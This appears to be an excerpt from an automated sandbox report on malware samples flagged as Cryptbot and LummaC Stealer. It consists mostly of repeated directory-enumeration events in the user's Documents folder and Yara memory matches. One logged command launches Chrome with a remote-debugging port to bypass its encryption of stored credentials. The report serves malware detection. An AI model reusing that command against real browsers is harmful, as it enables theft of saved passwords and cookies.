                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: number of queries: 1001
                              Source: Yara matchFile source: 00000023.00000003.2623844252.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2626627221.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2644595134.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2618199887.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2617522979.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000003.2812288913.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2646781296.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2638097998.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2640013020.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2642609561.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2632736175.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2628001159.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2649570679.0000000001087000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2628917343.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2648748009.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.2621190096.0000000001038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 5813f66ed1.exe PID: 5552, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Attempt to bypass Chrome Application-Bound Encryption
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                              Yara detected Cryptbot
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Yara detected LummaC Stealer
                              Source: Yara matchFile source: Process Memory Space: 5813f66ed1.exe PID: 5552, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
